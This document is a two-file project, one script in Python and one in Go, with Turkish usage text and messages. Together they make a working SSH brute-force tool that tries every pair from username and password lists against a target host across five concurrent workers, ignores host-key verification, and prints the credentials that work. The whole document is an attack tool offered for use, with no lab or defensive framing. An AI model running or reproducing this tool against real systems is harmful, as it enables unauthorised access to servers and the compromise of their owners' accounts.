File: ssh_bruteforce/ssh.py
import sys
import threading
from queue import Queue
import paramiko

def print_usage():
    print("""
Kullanım: python ssh.py -h <hedef_host> [-p <şifre> | -P <şifre_listesi>] [-u <kullanıcı_adı> | -U <kullanıcı_adı_listesi>]

Gerekli:
  -h <hedef_host>        Hedef IP veya hostname belirtin.
  -p <şifre>             Tek bir şifre belirtin.
  -P <şifre_listesi>     Şifreleri içeren bir dosya belirtin.
  -u <kullanıcı_adı>     Tek bir kullanıcı adı belirtin.
  -U <kullanıcı_adı_listesi> Kullanıcı adlarını içeren bir dosya belirtin.
    """)
    sys.exit(1)

def parse_arguments():
    args = sys.argv[1:]

    target = None
    password = None
    password_file = None
    username = None
    username_file = None

    if not args:
        print("Hata: Hiçbir argüman sağlanmadı.")
        print_usage()

    i = 0
    while i < len(args):
        if args[i] == '-h' and i + 1 < len(args):
            target = args[i + 1]
            i += 2
        elif args[i] == '-p' and i + 1 < len(args):
            password = args[i + 1]
            i += 2
        elif args[i] == '-P' and i + 1 < len(args):
            password_file = args[i + 1]
            i += 2
        elif args[i] == '-u' and i + 1 < len(args):
            username = args[i + 1]
            i += 2
        elif args[i] == '-U' and i + 1 < len(args):
            username_file = args[i + 1]
            i += 2
        else:
            print(f"Hata: Bilinmeyen veya eksik argüman: {args[i]}")
            print_usage()

    if not target:
        print("Hata: Hedef host (-h) belirtilmeli.")
        print_usage()

    if not (password or password_file):
        print("Hata: Şifre için ya -p ya da -P belirtilmeli.")
        print_usage()

    if not (username or username_file):
        print("Hata: Kullanıcı adı için ya -u ya da -U belirtilmeli.")
        print_usage()

    return target, password, password_file, username, username_file

def ssh_login(target, username, password):
    try:
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 
        ssh.connect(target, username=username, password=password, timeout=10)
        ssh.close()
        return True
    except paramiko.AuthenticationException:
        return False
    except Exception as e:
        print(f"[Hata] SSH bağlantısı sırasında hata: {e}")
        return False

def worker(queue, target):
    while not queue.empty():
        username, password = queue.get()
        print(f"[DEBUG] {username}:{password} bilgileri {target} üzerinde deneniyor")
        
        if ssh_login(target, username, password):
            print(f"[BAŞARILI] {username}:{password} bilgileri doğru!")
            queue.queue.clear()  
            break
        queue.task_done()

def main():
    target, password, password_file, username, username_file = parse_arguments()

    try:
        password_list = [password] if password else open(password_file).read().splitlines()
    except FileNotFoundError:
        print(f"Hata: Şifre dosyası '{password_file}' bulunamadı.")
        sys.exit(1)

    try:
        username_list = [username] if username else open(username_file).read().splitlines()
    except FileNotFoundError:
        print(f"Hata: Kullanıcı adı dosyası '{username_file}' bulunamadı.")
        sys.exit(1)

    queue = Queue()
    for u in username_list:
        for p in password_list:
            queue.put((u, p))

    threads = []
    for _ in range(5):  
        t = threading.Thread(target=worker, args=(queue, target))
        t.start()
        threads.append(t)

    for t in threads:
        t.join()

if __name__ == "__main__":
    main()

File: ssh_bruteforce_go/ssh.go
package main

import (
	"bufio"
	"flag"
	"fmt"
	"os"
	"sync"
	"time"

	"golang.org/x/crypto/ssh"
)

func printUsage() {
	fmt.Println(`
Kullanım: go run ssh.go -h <hedef_host> [-p <şifre> | -P <şifre_listesi>] [-u <kullanıcı_adı> | -U <kullanıcı_adı_listesi>]

Gerekli:
  -h <hedef_host>        Hedef IP veya hostname belirtin.
  -p <şifre>             Tek bir şifre belirtin.
  -P <şifre_listesi>     Şifreleri içeren bir dosya belirtin.
  -u <kullanıcı_adı>     Tek bir kullanıcı adı belirtin.
  -U <kullanıcı_adı_listesi> Kullanıcı adlarını içeren bir dosya belirtin.
	`)
	os.Exit(1)
}

func parseArguments() (string, []string, []string) {
	var target, password, passwordFile, username, usernameFile string

	flag.StringVar(&target, "h", "", "Hedef IP veya hostname")
	flag.StringVar(&password, "p", "", "Tek bir şifre")
	flag.StringVar(&passwordFile, "P", "", "Şifre dosyası")
	flag.StringVar(&username, "u", "", "Tek bir kullanıcı adı")
	flag.StringVar(&usernameFile, "U", "", "Kullanıcı adı dosyası")
	flag.Parse()

	if target == "" {
		fmt.Println("Hata: Hedef host (-h) belirtilmeli.")
		printUsage()
	}

	if password == "" && passwordFile == "" {
		fmt.Println("Hata: Şifre için ya -p ya da -P belirtilmeli.")
		printUsage()
	}

	if username == "" && usernameFile == "" {
		fmt.Println("Hata: Kullanıcı adı için ya -u ya da -U belirtilmeli.")
		printUsage()
	}

	var passwords []string
	if password != "" {
		passwords = []string{password}
	} else {
		passwords = readLines(passwordFile)
	}

	var usernames []string
	if username != "" {
		usernames = []string{username}
	} else {
		usernames = readLines(usernameFile)
	}

	return target, usernames, passwords
}

func readLines(path string) []string {
	file, err := os.Open(path)
	if err != nil {
		fmt.Printf("Hata: Dosya '%s' açılamadı: %s\n", path, err)
		os.Exit(1)
	}
	defer file.Close()

	var lines []string
	scanner := bufio.NewScanner(file)
	for scanner.Scan() {
		lines = append(lines, scanner.Text())
	}

	if err := scanner.Err(); err != nil {
		fmt.Printf("Hata: Dosya '%s' okunurken hata oluştu: %s\n", path, err)
		os.Exit(1)
	}

	return lines
}

func sshLogin(target, username, password string) bool {
	config := &ssh.ClientConfig{
		User: username,
		Auth: []ssh.AuthMethod{
			ssh.Password(password),
		},
		HostKeyCallback: ssh.InsecureIgnoreHostKey(),
		Timeout:         5 * time.Second,
	}

	conn, err := ssh.Dial("tcp", target+":22", config)
	if err != nil {
		if err.Error() == "ssh: handshake failed: ssh: unable to authenticate" {
			return false
		}
		fmt.Printf("[Hata] SSH bağlantısı sırasında hata: %s\n", err)
		return false
	}
	defer conn.Close()
	return true
}

func worker(wg *sync.WaitGroup, jobs <-chan [2]string, target string) {
	defer wg.Done()

	for job := range jobs {
		username, password := job[0], job[1]
		fmt.Printf("[DEBUG] %s:%s bilgileri %s üzerinde deneniyor\n", username, password, target)

		if sshLogin(target, username, password) {
			fmt.Printf("[BAŞARILI] %s:%s bilgileri doğru!\n", username, password)
			os.Exit(0)
		}
	}
}

func main() {
	target, usernames, passwords := parseArguments()

	jobs := make(chan [2]string, len(usernames)*len(passwords))

	for _, username := range usernames {
		for _, password := range passwords {
			jobs <- [2]string{username, password}
		}
	}
	close(jobs)

	var wg sync.WaitGroup
	for i := 0; i < 5; i++ { // 5 eşzamanlı iş parçacığı
		wg.Add(1)
		go worker(&wg, jobs, target)
	}

	wg.Wait()
	fmt.Println("[Tamamlandı] Tüm kombinasyonlar denendi.")
}
